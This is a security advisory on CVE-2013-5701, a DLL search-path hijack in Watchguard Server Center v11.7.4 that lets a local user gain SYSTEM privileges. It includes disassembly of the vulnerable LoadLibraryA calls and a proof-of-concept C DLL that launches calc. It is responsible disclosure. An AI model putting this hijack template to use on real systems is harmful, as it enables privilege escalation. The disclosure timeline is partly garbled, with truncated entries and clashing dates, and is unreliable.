Get in touch

Watchguard Server Center v11.7.4 wgpr.dll Insecure Library Loading Local Privilege Escalation Vulnerability

Aug 9, 2013 · By Julien Ahrens

ADVISORY INFORMATION

  • Product: Watchguard Server Center
  • Vendor URL: https://www.watchguard.com
  • Type: Uncontrolled Search Path Element [CWE-427]
  • Date found: 2013-07-29
  • Date published: 2013-08-09
  • CVSSv2 Score: 6,6 (AV:L/AC:M/Au:S/C:C/I:C/A:C)
  • CVE: CVE-2013-5701

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

Watchguard Server Center v11.7.4 Watchguard Server Center v11.7.3 and other older versions may be affected too.

VULNERABILITY DETAILS

An insecure library loading vulnerability has been identified in different components of the Watchguard Server Center v11.7.4.

The application installs two services “Watchguard Log Collector” (%installdir%\wsm11\wlcollector\bin\wlcollector.exe) and “Watchguard WebBlocker Server” (%installdir%\wsm11\wbserver\bin\wbserver.exe).

Both application services use a fixed path to look for specific files or libraries. This path includes directories that may not be trusted or under user control.

By placing a custom version of a library in the application path, the program will load it before the legitimate version. This allows an attacker to inject custom code that will be run with the privilege of the program or user executing the program. The following libraries could be hijacked on this way:

wgpr.dll

Since both services are running using the SYSTEM account, this may allow a less privileged user to gain access to SYSTEM privileges. A local attacker or compromised process is able to put a malicious application library into the directory which will be executed after a service restart.

On a default installation (%programfiles%\Watchguard) of the Watchguard Server Center on Windows Vista and above the directory permissions disallow an low-privileged attacker to mount the attack.

On a default installation (%programfiles%\Watchguard) of the Watchguard Server Center on Windows XP, the attacker needs to have at least Power User rights to successfully mount the attack.

On a non-default installation of the Watchguard Server Center to a directory, which is writeable by a low-privileged user, the attack can be mounted successfully without any restrictions.

DEBUG INFORMATION

The vulnerable code part of wlcollector.exe:

00401691 MOV EDI,DWORD PTR DS:[<&KERNEL32.LoadLib>; kernel32.LoadLibraryA 00401697 MOV ESI,EAX 00401699 TEST ESI,ESI 0040169B JE SHORT wlcollec.004016B3

0040169D  PUSH wlcollec.00409320              ; /ProcNameOrOrdinal
004016A2  PUSH wlcollec.00409310              ; |/FileName = "kernel32.dll"
004016A7  CALL EDI                            ; |\LoadLibraryA
004016A9  PUSH EAX                            ; |hModule
004016AA  CALL EBX                            ; \GetProcAddress

004016AC TEST EAX,EAX 004016AE JE SHORT wlcollec.004016B3 004016B0 PUSH ESI 004016B1 CALL EAX

004016B3  PUSH wlcollec.00409304              ;  ASCII "wgpr.dll"
004016B8  CALL EDI                            ;  kernel32.LoadLibraryA

The vulnerable code part of wbserver.exe

00401041 MOV EDI,DWORD PTR DS:[<&KERNEL32.LoadLib>; kernel32.LoadLibraryA 00401047 MOV ESI,EAX 00401049 TEST ESI,ESI 0040104B JE SHORT wbserver.00401063

0040104D  PUSH wbserver.00408284              ; /ProcNameOrOrdinal
00401052  PUSH wbserver.00408274              ; |/FileName = "kernel32.dll"
00401057  CALL EDI                            ; |\LoadLibraryA
00401059  PUSH EAX                            ; |hModule
0040105A  CALL EBX                            ; \GetProcAddress

0040105C TEST EAX,EAX 0040105E JE SHORT wbserver.00401063 00401060 PUSH ESI 00401061 CALL EAX

00401063  PUSH wbserver.00408268              ;  ASCII "wgpr.dll"

00401068 CALL EDI

PROOF OF CONCEPT

Use the following code to exploit the vulnerability:

#include <windows.h>

#define DLL_EXPORT __declspec(dllexport)

#ifdef __cplusplus extern "C" { #endif

void DLL_EXPORT wgpr_library_get() {
    WinExec("calc",0);
}

#ifdef __cplusplus } #endif

SOLUTION

Administrators who installed the Watchguard Server Center on WinXP or outside the default installation folder, should harden the directories permissions (administrative write permissions only) on the mentioned folders to lower the attack risk.

REPORT TIMELINE

  • 2013-07-29: Discovery of the vulnerability
  • 2013-07-30: RCE Security sends first notification to Customer Care via mail
  • 2013-08-05: RCE Security sends second notification using Twitter
  • 2013-08-05: Response from vendor
  • 2013-08-05: RCE Security sends vulnerability details to vendor
  • 2013-08-05: Vendor ACKs the issue and asks for an extension of 30 days
  • 2013-08-06: New disclosure date set to 13. September 2013
  • 2013-08-06: Vendor assigns bug id #75251
  • 2013-08-19: No further status updates received according to disclosure
  • 2013-08-19: Vendor estimates the risk of the issue as “extremely limited”,
  • 2013-08-28: Vendor plans to release the fix with the next major release in
  • 2013-09-05: MITRE assigns CVE-2013-5701 for this issue
  • 2013-09-08: Full Disclosure

with disclosure date set to 13. August 2013 policy, asking for status update and therefor ACKs the public disclosure around Q4

REFERENCES